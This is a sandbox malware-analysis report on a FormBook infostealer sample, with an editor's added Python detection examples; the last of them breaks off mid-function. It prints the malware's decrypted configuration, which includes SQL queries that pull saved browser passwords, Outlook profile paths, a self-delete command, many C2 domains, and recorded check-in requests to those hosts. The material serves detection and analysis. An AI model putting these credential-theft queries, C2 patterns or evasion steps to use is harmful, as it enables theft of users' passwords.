
Analysis Report Po-covid19 2372#w2..exe

Overview

General Information

Sample Name: Po-covid19 2372#w2..exe
Analysis ID: 338985
MD5: bf53c9dc0d0f032033c318aceef906c6
SHA1: eeba1ef352c09979dfdfb4afdcdc5f41fe2a0119
SHA256: a1558391914f4235dfdcdddcdf0de915a800541a4271feb4aff34af82b83a935
Tags: COVID19, exe, Formbook

Detection

FormBook
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected AntiVM_3
Yara detected FormBook
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect virtualization through RDTSC time measurements
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • Po-covid19 2372#w2..exe (PID: 5532 cmdline: 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: BF53C9DC0D0F032033C318ACEEF906C6)
    • Po-covid19 2372#w2..exe (PID: 5404 cmdline: {path} MD5: BF53C9DC0D0F032033C318ACEEF906C6)
      • explorer.exe (PID: 3388 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • msiexec.exe (PID: 6748 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 12C17B5A5C2A7B97342C362CA467E9A2)
          • cmd.exe (PID: 7092 cmdline: /c del 'C:\Users\user\Desktop\Po-covid19 2372#w2..exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 7100 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
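
The tree above shows the sample re-launching its own image, explorer.exe appearing beneath the second instance (the report attributes this to injection), msiexec.exe started from explorer.exe with a bare command line, and cmd.exe deleting the original file. The following is an added example, not part of the Joe Sandbox report: a Python triage pass over process-creation events constructed from the PIDs and command lines listed above. The events are not a real Sysmon or ETW export; the launcher PID (1000) and the image paths of explorer.exe and cmd.exe are assumptions, since the report records only the command lines.

```python
"""Process-tree triage for the Startup tree above.

Added example, not part of the sandbox report. EVENTS is constructed from
the PIDs and command lines the report lists; it is not a real Sysmon/ETW
export. Assumptions: ppid 1000 for the first process (no launcher is
recorded) and the image paths of explorer.exe and cmd.exe.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str


SAMPLE = r"C:\Users\user\Desktop\Po-covid19 2372#w2..exe"

# The sandbox draws explorer.exe beneath the second sample instance because
# code was injected into it; a real event log would show explorer's own parent.
EVENTS = [
    Proc(5532, 1000, SAMPLE, f"'{SAMPLE}'"),
    Proc(5404, 5532, SAMPLE, f"'{SAMPLE}'"),
    Proc(3388, 5404, "C:\\Windows\\explorer.exe", ""),
    Proc(6748, 3388, "C:\\Windows\\SysWOW64\\msiexec.exe",
         "C:\\Windows\\SysWOW64\\msiexec.exe"),
    Proc(7092, 6748, "C:\\Windows\\SysWOW64\\cmd.exe", f"/c del '{SAMPLE}'"),
    Proc(7100, 7092, "C:\\Windows\\system32\\conhost.exe",
         "C:\\Windows\\system32\\conhost.exe 0xffffffff -ForceV1"),
]

SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
# The report renders quotes as single quotes; accept either kind.
DEL_RE = re.compile(r"\bdel\s+['\"]?(.+?)['\"]?\s*$", re.IGNORECASE)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def ancestors(pid, by_pid):
    """Yield the parent chain of pid, stopping at an unknown parent or a loop."""
    seen = {pid}
    p = by_pid.get(pid)
    while p is not None and p.ppid in by_pid and p.ppid not in seen:
        seen.add(p.ppid)
        p = by_pid[p.ppid]
        yield p


def analyze(events):
    """Return (rule, pid) pairs for the three patterns visible in the tree."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parent = by_pid.get(e.ppid)
        # 1. A process re-launching its own image, the setup behind the
        #    report's 'Creates a process in suspended mode' / hollowing notes.
        if parent and parent.image.lower() == e.image.lower():
            hits.append(("self_spawn", e.pid))
        # 2. A Windows system binary started by explorer.exe with a bare
        #    command line (no arguments), as msiexec.exe is here.
        if (parent and basename(parent.image) == "explorer.exe"
                and e.image.lower().startswith(SYSTEM_DIRS)
                and e.cmdline.strip().strip("'\"").lower() == e.image.lower()):
            hits.append(("bare_system_binary_from_explorer", e.pid))
        # 3. cmd.exe deleting a file that is the image of one of its ancestors:
        #    the sample removing itself after injection.
        m = DEL_RE.search(e.cmdline) if basename(e.image) == "cmd.exe" else None
        if m:
            target = m.group(1).lower()
            if any(a.image.lower() == target for a in ancestors(e.pid, by_pid)):
                hits.append(("self_delete", e.pid))
    return hits


if __name__ == "__main__":
    for rule, pid in analyze(EVENTS):
        print(f"{rule:34s} pid={pid}")
```

The third rule is the strongest of the three on its own: a `del` whose target is an ancestor's image is rare in legitimate activity, while rules 1 and 2 are better used to raise the score of a tree than to alert alone. The report lists no matching Sigma rule for this run, so the tree is worth encoding locally.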

Malware Configuration

Threatname: FormBook

{"Config: ": ["CONFIG_PATTERNS 0x8bc3", "KEY1_OFFSET 0x1d7db", "CONFIG SIZE : 0xd9", "CONFIG OFFSET 0x1d8dd", "URL SIZE : 28", "searching string pattern", "strings_offset 0x1c383", "searching hashes pattern", "--------------------------------------------------", "Decrypted Function Hashes", "--------------------------------------------------", "0xfd2db44c", "0xf43668a6", "0x980476e5", "0x35a6d50c", "0xf89290dc", "0x94261f57", "0x7d54c891", "0x47cb721", "0xf72d70b3", "0x9f715022", "0xbf0a5e41", "0x2902d074", "0xf653b199", "0xc8c42cc6", "0x2e1b7599", "0x210d4d07", "0x6d2a7921", "0x8ea85a2f", "0x207c50ff", "0xb967410a", "0x1eb17415", "0xb46802f8", "0x11da8518", "0xf42ed5c", "0x2885a3d3", "0x445675fa", "0x5c289b4c", "0x40ede5aa", "0xf24946a2", "0x8559c3e2", "0xb9d34d23", "0xa14d0a19", "0x2d07bbe2", "0xbbd1d68c", "0xb28c29d4", "0x3911edeb", "0xefad046d", "0xa0605497", "0xf5529cbf", "0x5507576a", "0xfa2467c8", "0x5b6423bf", "0xe22409b9", "0xde1eba2", "0xae847e2", "0xa8cfcc9", "0x26fc2c69", "0x5d8a75ac", "0x22eb3474", "0x2b37c918", "0x79402007", "0x7544791c", "0x641b2c94", "0x1db04ecf", "0xf5d02cd8", "0xad0121d2", "0x6206e716", "0x5e4b9b9a", "0xe4e2f5f4", "0x54c93159", "0x25ea79b", "0x5bf29119", "0xd6507db", "0x32ffc9f8", "0xe4cfab72", "0x98db5380", "0xce4cc542", "0x3092a0a2", "0x66053660", "0x2607a133", "0xfcd01541", "0x80b41d4", "0x4102ad8d", "0x857bf6a6", "0xd3ec6064", "0x23145fc4", "0xc026698f", "0x8f5385d8", "0x2430512b", "0x3ebe9086", "0x4c6fddb5", "0x276db13e", "0xe00f0a8e", "0x85cf9404", "0xb2248784", "0xcdc7e023", "0x11f5f50", "0x1dd4bc1c", "0x8235fce2", "0x21b17672", "0xbba64d93", "0x2f0ee0d8", "0x9cb95240", "0x28c21e3f", "0x9347ac57", "0x9d9522dc", "0x911bc70e", "0x74443db9", "0xf04c1aa9", "0x6484bcb5", "0x11fc2f72", "0x2b44324f", "0x9d70beea", "0x59adf952", "0x172ac7b4", "0x5d4b4e66", "0xed297eae", "0xa88492a6", "0xb21b057c", "0x70f35767", "0xb6f4d5a8", "0x67cea859", "0xc1626bff", "0xb4e1ae2", "0x24a48dcf", "0xe11da208", "0x1c920818", "0x65f4449c", 
"0xc30bc050", "0x3e86e1fb", "0x9e01fc32", "0x216500c2", "0x48e207c9", "0x2decf13e", "0x19996921", "0xb7da3dd7", "0x47f39d2b", "0x6777e2de", "0xd980e37f", "0x963fea3b", "0xacddb7ea", "0x110aec35", "0x647331f3", "0x2e381da4", "0x50f66474", "0xec16e0c0", "0xf9d81a42", "0xd6c6f9db", "0xef3df91", "0x60e0e203", "0x7c81caaf", "0x71c2ec76", "0x25e431cc", "0x106f568f", "0x6a60c8a9", "0xb758aab3", "0x3b34de90", "0x700420f5", "0xee359a7e", "0xd1d808a", "0x47ba47a5", "0xff959c4c", "0x5d30a87d", "0xaa95a900", "0x80b19064", "0x9c5a481a", "0x1dd252d", "0xdb3055fc", "0xe0cf8bf1", "0x3a48eabc", "0xf0472f97", "0x4a6323de", "0x4260edca", "0x53f7fb4f", "0x3d2e9c99", "0xf6879235", "0xe6723cac", "0xe184dfaa", "0xe99ffaa0", "0xf6aebe25", "0xefadf9a5", "0x215de938", "0x757906aa", "0x84f8d766", "0xb6494f65", "0x13a75318", "0x5bde5587", "0xe9eba2a4", "0x6b8a0df3", "0x9c02f250", "0xe52a2a2e", "0xdb96173c", "0x3c0f2fc", "0xd45e157c", "0x4edd1210", "0x2b127ce0", "0xadc887b6", "0xf45a1c52", "0xc84869d7", "0x36dc1f04", "0x50c2a508", "0x3e88e8bf", "0x4b6374a6", "0x72a93198", "0x85426977", "0xea193e11", "0xea653007", "0xe297c9c", "0x65399e87", "0x23609e75", "0xb92e8a5a", "0xabc89476", "0xd989572f", "0x4536ab86", "0x3476afc1", "0xaf24a63b", "0x393b9ac8", "0x414a3c70", "0x487e77f4", "0xbee1bdf6", "0xc30c49a6", "0xcb591d7f", "0x5c4ee455", "0x7c81c71d", "0x11c6f95e", "--------------------------------------------------", "Decrypted Strings", "--------------------------------------------------", "USERNAME", "LOCALAPPDATA", "USERPROFILE", "APPDATA", "TEMP", "ProgramFiles", "CommonProgramFiles", "ALLUSERSPROFILE", "/c copy \"", "/c del \"", "\\Run", "\\Policies", "\\Explorer", "\\Registry\\User", "\\Registry\\Machine", "\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", "Office\\15.0\\Outlook\\Profiles\\Outlook\\", " NT\\CurrentVersion\\Windows Messaging Subsystem\\Profiles\\Outlook\\", "\\SOFTWARE\\Mozilla\\Mozilla ", "\\Mozilla", "Username: ", "Password: ", "formSubmitURL", "usernameField", 
"encryptedUsername", "encryptedPassword", "\\logins.json", "\\signons.sqlite", "\\Microsoft\\Vault\\", "SELECT encryptedUsername, encryptedPassword, formSubmitURL FROM moz_logins", "\\Google\\Chrome\\User Data\\Default\\Login Data", "SELECT origin_url, username_value, password_value FROM logins", ".exe", ".com", ".scr", ".pif", ".cmd", ".bat", "ms", "win", "gdi", "mfc", "vga", "igfx", "user", "help", "config", "update", "regsvc", "chkdsk", "systray", "audiodg", "certmgr", "autochk", "taskhost", "colorcpl", "services", "IconCache", "ThumbCache", "Cookies", "SeDebugPrivilege", "SeShutdownPrivilege", "\\BaseNamedObjects", "config.php", "POST ", " HTTP/1.1", "", "Host: ", "", "Connection: close", "", "Content-Length: ", "", "Cache-Control: no-cache", "", "Origin: http://", "", "User-Agent: Mozilla Firefox/4.0", "", "Content-Type: application/x-www-form-urlencoded", "", "Accept: */*", "", "Referer: http://", "", "Accept-Language: en-US", "", "Accept-Encoding: gzip, deflate", "", "dat=", "f-start", "kimberlyrutledge.com", "auctus.agency", "johnemotions.com", "guilt-brilliant.com", "wxshangdian.com", "theolivetreeonline.com", "stellarfranchisebrands.com", "every1no1.com", "hoangthanhgroup.com", "psm-gen.com", "kingdomwow.com", "digitalksr.com", "karynpolitoforlg.com", "youthdaycalgary.com", "libertyhandymanservicesllc.com", "breatheohio.com", "allenleather.com", "transformafter50.info", "hnhsylsb.com", "hmtradebd.com", "besrhodislandhomes.com", "zuwozo.com", "southernhighlandsnails.com", "kaaxg.com", "bauer-cobolt.com", "steelyourselfshop.net", "linksoflondoncharmscheap.com", "groundwork-pt.com", "beautifulangelicskin.com", "aduhelmfinancialsupport.com", "xn--carpinteratarifa-hsb.com", "thekingink.net", "ocotegrill.com", "gilbertdodge.com", "insuranceinquirer.com", "withagentcy.com", "deeparchivesvpn.com", "blamekd.com", "acsdealta.xyz", "dsxcj.com", "kimonoshihan.com", "bosquefamily.com", "5587sk.com", "integrative.life", "unitedjournal.info", "lynxdeck.com", 
"onlyfanyou.com", "aminomedicalscience.com", "rachenstern-technik.com", "thejewelrybox.net", "stopcolleges.com", "thesaltlifestyle.com", "tappesupportservices.com", "andrewgreenhomes.com", "meidiansc.com", "gobalexporter.com", "rvpji571m.xyz", "alwekalaaladabeya.com", "scientificimaginetics.com", "skaizenpharma.com", "balloonpost.club", "thefunnythingabout.com", "premium-vitality.com", "businesscalmcoaching.com", "f-end", "--------------------------------------------------", "Decrypted CnC URL", "--------------------------------------------------", "www.styrelseforum.com/p95n/\u0000"]}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
    • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
    • 0x18429:$sqlite3step: 68 34 1C 7B E1
    • 0x1853c:$sqlite3step: 68 34 1C 7B E1
    • 0x18458:$sqlite3text: 68 38 2A 90 C5
    • 0x1857d:$sqlite3text: 68 38 2A 90 C5
    • 0x1846b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x18593:$sqlite3blob: 68 53 D8 7F 8C
00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(18 further memory-dump matches not shown)

      Unpacked PEs

Source | Rule | Description | Author | Strings
3.2.Po-covid19 2372#w2..exe.400000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.Po-covid19 2372#w2..exe.400000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
        • 0x8ae8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x8d62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x14885:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x14371:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x14987:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x14aff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x977a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x135ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0xa473:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x1a707:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x1b70a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
3.2.Po-covid19 2372#w2..exe.400000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
        • 0x17629:$sqlite3step: 68 34 1C 7B E1
        • 0x1773c:$sqlite3step: 68 34 1C 7B E1
        • 0x17658:$sqlite3text: 68 38 2A 90 C5
        • 0x1777d:$sqlite3text: 68 38 2A 90 C5
        • 0x1766b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x17793:$sqlite3blob: 68 53 D8 7F 8C
3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x98e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b62:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x15685:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x15171:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x15787:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x158ff:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa57a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x143ec:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb273:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b507:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c50a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE match not shown)
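
The offsets listed for 3.2.Po-covid19 2372#w2..exe.400000.0.unpack are 0xE00 lower than those listed for the memory dumps and for the .raw.unpack artifact (0x8ae8 against 0x98e8, 0x17629 against 0x18429), a constant shift of the kind produced when an in-memory image is rebuilt to file alignment; when reusing these offsets in another tool, check which artifact they belong to. The following is an added example, not part of the report and not the JPCERT/CC or yara-signator rules themselves: a Python scanner that searches a buffer for the rule strings listed above and decodes the immediates of the JPCERT push strings. The scanned buffer is constructed (filler with the patterns written at chosen offsets), the disassembly in the comments is the editor's reading of the bytes, and the "all three sqlite3 strings present" verdict is the scanner's own condition, since the original rule conditions are not shown in the report.

```python
"""Scan a memory image for the Yara strings listed above.

Added example, not part of the report and not the JPCERT/CC or yara-signator
rules themselves. PATTERNS copies the rule strings as the report prints them;
the disassembly in the comments is the editor's reading of those bytes. The
scanned buffer is constructed, and the verdict condition is this scanner's
own, since the original rule conditions are not shown in the report.
"""
import struct

PATTERNS = {
    # JPCERT/CC 'Formbook': each string is 'push imm32' (opcode 0x68) of a
    # hashed API name, as the string identifiers suggest.
    "sqlite3step": "68 34 1C 7B E1",
    "sqlite3text": "68 38 2A 90 C5",
    "sqlite3blob": "68 53 D8 7F 8C",
    # yara-signator 'Formbook_1' $sequence_0:
    #   03 C8      add ecx, eax
    #   0F 31      rdtsc
    #   2B C1      sub eax, ecx
    #   89 45 FC   mov [ebp-4], eax
    # i.e. an RDTSC delta, matching the report's RDTSC timing-check signature.
    "sequence_0": "03 C8 0F 31 2B C1 89 45 FC",
}
SQLITE_STRINGS = ("sqlite3step", "sqlite3text", "sqlite3blob")


def hex_to_bytes(pattern):
    return bytes.fromhex(pattern.replace(" ", ""))


def find_all(buf, needle):
    """All offsets of needle in buf (overlapping matches included)."""
    offsets, i = [], buf.find(needle)
    while i != -1:
        offsets.append(i)
        i = buf.find(needle, i + 1)
    return offsets


def scan(buf):
    """Return {pattern name: [offsets]} for every pattern present in buf."""
    hits = {}
    for name, pattern in PATTERNS.items():
        offsets = find_all(buf, hex_to_bytes(pattern))
        if offsets:
            hits[name] = offsets
    return hits


def pushed_imm32(pattern):
    """Decode the little-endian immediate of a 5-byte 'push imm32' string."""
    b = hex_to_bytes(pattern)
    if len(b) != 5 or b[0] != 0x68:
        raise ValueError("not a push imm32 pattern")
    return struct.unpack("<I", b[1:])[0]


def verdict(hits):
    """Scanner's own condition: all three sqlite3 strings present."""
    return all(name in hits for name in SQLITE_STRINGS)


# Constructed test image: 512 bytes of filler with the patterns written at
# fixed offsets (two copies of sqlite3step, as the report shows two hits).
PLACEMENT = {"sqlite3step": [0x40, 0x1C0], "sqlite3text": [0x60],
             "sqlite3blob": [0x80], "sequence_0": [0x100]}


def build_sample():
    buf = bytearray(bytes(range(256)) * 2)
    for name, offsets in PLACEMENT.items():
        pat = hex_to_bytes(PATTERNS[name])
        for off in offsets:
            buf[off:off + len(pat)] = pat
    return bytes(buf)


if __name__ == "__main__":
    image = build_sample()
    hits = scan(image)
    for name, offsets in hits.items():
        print(name, [hex(o) for o in offsets])
    for name in SQLITE_STRINGS:
        print(f"{name}: hash 0x{pushed_imm32(PATTERNS[name]):08x}")
    print("FormBook indicators present:", verdict(hits))
```

Decoding the immediates is what makes the JPCERT strings portable: the same 32-bit values can be searched for in other dumps as data, not only as the 5-byte push encoding, if a later build stores the hashes in a table instead of pushing them inline.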

          Sigma Overview

          No Sigma rule has matched

          Signature Overview


          AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Po-covid19 2372#w2..exe; Avira: detected
Found malware configuration
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack; Malware Configuration Extractor: FormBook (the extracted configuration is reproduced in full in the Malware Configuration section above)
Multi AV Scanner detection for submitted file
Source: Po-covid19 2372#w2..exe; ReversingLabs: Detection: 27%
Yara detected FormBook
Source: Yara match; file source: 0000000E.00000002.616475940.0000000000B40000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.297322370.0000000000FB0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 0000000E.00000002.614725408.0000000000680000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 0000000E.00000002.616862762.0000000000B70000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.296624622.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000003.00000002.298199420.00000000013B0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 00000000.00000002.256080598.000000000406F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; file source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; file source: 3.2.Po-covid19 2372#w2..exe.400000.0.raw.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: Po-covid19 2372#w2..exe; Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 3.2.Po-covid19 2372#w2..exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen

          Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe; Unpacked PE file: 0.2.Po-covid19 2372#w2..exe.70000.0.unpack
Source: Po-covid19 2372#w2..exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: Po-covid19 2372#w2..exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: msiexec.pdb; source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
Source: Binary string: msiexec.pdbGCTL; source: Po-covid19 2372#w2..exe, 00000003.00000002.298579388.0000000001410000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdbUGP; source: Po-covid19 2372#w2..exe, 00000003.00000002.299260110.000000000160F000.00000040.00000001.sdmp, msiexec.exe, 0000000E.00000002.618326850.0000000004560000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: Po-covid19 2372#w2..exe, msiexec.exe
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe; Code function: 4x nop then pop esi; 3_2_004172D9
Source: C:\Users\user\Desktop\Po-covid19 2372#w2..exe; Code function: 4x nop then pop edi; 3_2_00417D8F
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then pop esi; 14_2_006972D9
Source: C:\Windows\SysWOW64\msiexec.exe; Code function: 4x nop then pop edi; 14_2_00697D8F

          Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49737 -> 165.160.13.20:80
Source: global traffic; HTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=BBaWJPlPEO+nvtMqhmqrcRgDtKq1LKrnuc6I0tDI+4mn5icveD46W7DXUUudv5GhOCct HTTP/1.1 | Host: www.thesaltlifestyle.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (no printable bytes)
Source: global traffic; HTTP traffic detected: GET /p95n/?oH5h=yIt3vHGcFY19i9LszRbGqv8br4EBNSz7kQseU3pL44UQdgKo/VZu2mbLhFyK51ONzUns&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1 | Host: www.aduhelmfinancialsupport.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (no printable bytes)
Source: global traffic; HTTP traffic detected: GET /p95n/?u6ihA=cjlpdRL8ZtfDvB1&oH5h=gRhj5HMuZvR/Ec7o8oi+HxLziNFcY38IPUSKESyExHr5bx7zEB/jrV73UqEK091YdqI8 HTTP/1.1 | Host: www.scientificimaginetics.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (no printable bytes)
Source: global traffic; HTTP traffic detected: GET /p95n/?oH5h=OkCbzDuuF1pG8/+FjCqUEbhCI/Ef9I/I5jzkOiKX/zkELnGsjuBbK/8sh3SawKW3Kze/&u6ihA=cjlpdRL8ZtfDvB1 HTTP/1.1 | Host: www.johnemotions.com | Connection: close | Data Raw: 00 00 00 00 00 00 00 | Data Ascii: (no printable bytes)
Source: Joe Sandbox View; IP Address: 34.102.136.180
Source: Joe Sandbox View; ASN Name: POWERLINE-AS-APPOWERLINEDATACENTERHK
Source: Joe Sandbox View; ASN Name: GOOGLEUS
Source: Joe Sandbox View; ASN Name: CLOUDFLARENETUS
Source: unknown; DNS traffic detected: queries for: www.thesaltlifestyle.com
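
All four Host values in the recorded requests (thesaltlifestyle.com, aduhelmfinancialsupport.com, scientificimaginetics.com, johnemotions.com) appear in the Decrypted Strings domain list of the extracted configuration, the request path /p95n/ is the path of the Decrypted CnC URL, the requests carry no User-Agent header, and the parameter u6ihA=cjlpdRL8ZtfDvB1 is repeated verbatim across hosts. The following is an added example, not part of the report: Python that rebuilds the recorded requests from the lines above (Host and Connection were the only headers recorded, and the 7-byte null body is the "Data Raw" shown), parses them, and applies those checks plus a cross-request token check. The benign request, the CONFIG_DOMAINS subset and the "strip www." domain normalization are constructed simplifications.

```python
"""Relate the recorded FormBook check-in requests to the extracted config.

Added example, not part of the report. REQUESTS rebuilds the four GET lines
the report shows (Host and Connection were the only recorded headers; the
body is the 7 null bytes shown as 'Data Raw') plus one constructed benign
request. CONFIG_DOMAINS is a subset of the 'Decrypted Strings' domains and
C2_URL is the 'Decrypted CnC URL' from the Malware Configuration section.
"""
from collections import defaultdict

C2_URL = "www.styrelseforum.com/p95n/"
C2_PATH = "/" + C2_URL.split("/", 1)[1]          # "/p95n/"
CONFIG_DOMAINS = {
    "styrelseforum.com", "thesaltlifestyle.com", "aduhelmfinancialsupport.com",
    "scientificimaginetics.com", "johnemotions.com", "kimberlyrutledge.com",
}


def _raw(host, target, extra_headers="", body="\x00" * 7):
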